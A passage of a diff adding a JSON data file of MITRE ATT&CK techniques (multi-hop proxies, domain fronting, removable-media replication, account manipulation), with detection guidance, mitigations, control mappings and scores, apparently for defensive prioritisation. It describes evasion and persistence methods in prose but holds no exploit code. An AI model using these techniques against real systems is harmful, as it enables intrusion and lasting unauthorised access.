+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1090.003",
+        "name": "Proxy: Multi-hop Proxy",
+        "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)\n\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.",
+        "url": "https://attack.mitre.org/techniques/T1090/003",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.\n\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1090",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.22857142857142856,
+        "adjusted_score": 0.22857142857142856,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "9.3",
+            "13.4"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1090.004",
+        "name": "Proxy: Domain Fronting",
+        "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.",
+        "url": "https://attack.mitre.org/techniques/T1090/004",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1090",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1020",
+                "name": "SSL/TLS Inspection",
+                "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
+                "url": "https://attack.mitre.org/mitigations/M1020"
+            }
+        ],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [
+            "SC-8"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1091",
+        "name": "Replication Through Removable Media",
+        "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
+        "url": "https://attack.mitre.org/techniques/T1091",
+        "tactics": [
+            "Initial Access",
+            "Lateral Movement"
+        ],
+        "detection": "Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Drive: Drive Creation",
+            "File: File Access",
+            "File: File Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1034",
+                "name": "Limit Hardware Installation",
+                "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
+                "url": "https://attack.mitre.org/mitigations/M1034"
+            }
+        ],
+        "cumulative_score": 0.4583702366666667,
+        "adjusted_score": 0.4583702366666667,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
+            "7.7",
+            "10.3",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "MP-7",
+            "RA-5",
+            "SC-41",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.16666666666666669,
+            "mitigation_score": 0.3090909090909091,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.19170357
+    },
+    {
+        "tid": "T1092",
+        "name": "Communication Through Removable Media",
+        "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.",
+        "url": "https://attack.mitre.org/techniques/T1092",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Drive: Drive Access",
+            "Drive: Drive Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.24285714285714285,
+        "adjusted_score": 0.24285714285714285,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
+            "4.8",
+            "10.3",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "MP-7",
+            "RA-5",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.14285714285714285,
+            "mitigation_score": 0.2727272727272727
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1095",
+        "name": "Non-Application Layer Protocol",
+        "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)\n Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
+        "url": "https://attack.mitre.org/techniques/T1095",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) \n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 1.4119047619047618,
+        "adjusted_score": 1.4119047619047618,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "4.5",
+            "7.6",
+            "7.7",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.4",
+            "13.8",
+            "18.2",
+            "18.3",
+            "13.10"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2619047619047619,
+            "mitigation_score": 0.43636363636363634,
+            "detection_score": 0.07
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1098",
+        "name": "Account Manipulation",
+        "description": "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.",
+        "url": "https://attack.mitre.org/techniques/T1098",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution",
+            "File: File Modification",
+            "Group: Group Modification",
+            "Process: Process Creation",
+            "User Account: User Account Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1098.001",
+                "name": "Account Manipulation: Additional Cloud Credentials",
+                "url": "https://attack.mitre.org/techniques/T1098/001",
+                "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nAdversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)",
+                "detection": "Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1098.002",
+                "name": "Account Manipulation: Exchange Email Delegate Permissions",
+                "url": "https://attack.mitre.org/techniques/T1098/002",
+                "description": "Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)",
+                "detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1098.003",
+                "name": "Account Manipulation: Add Office 365 Global Administrator Role",
+                "url": "https://attack.mitre.org/techniques/T1098/003",
+                "description": "An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.",
+                "detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1098.004",
+                "name": "Account Manipulation: SSH Authorized Keys",
+                "url": "https://attack.mitre.org/techniques/T1098/004",
+                "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)",
+                "detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.745592528095238,
+        "adjusted_score": 0.745592528095238,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "3.3",
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "11.3",
+            "11.4",
+            "12.2",
+            "12.8",
+            "16.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "SC-46",
+            "SC-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.638095238095238,
+            "mitigation_score": 0.6,
+            "detection_score": 0.68
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00749729
+    },
+    {
+        "tid": "T1098.001",
+        "name": "Account Manipulation: Additional Cloud Credentials",
+        "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nAdversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)",
+        "url": "https://attack.mitre.org/techniques/T1098/001",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.",
+        "platforms": [
+            "Azure AD",
+            "IaaS"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "User Account: User Account Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1098",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.4095238095238095,
+        "adjusted_score": 0.4095238095238095,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "3.3",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "11.3",
+            "11.4",
+            "12.2",
+            "12.8",
+            "16.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1098.002",
+        "name": "Account Manipulation: Exchange Email Delegate Permissions",
+        "description": "Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)",
+        "url": "https://attack.mitre.org/techniques/T1098/002",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
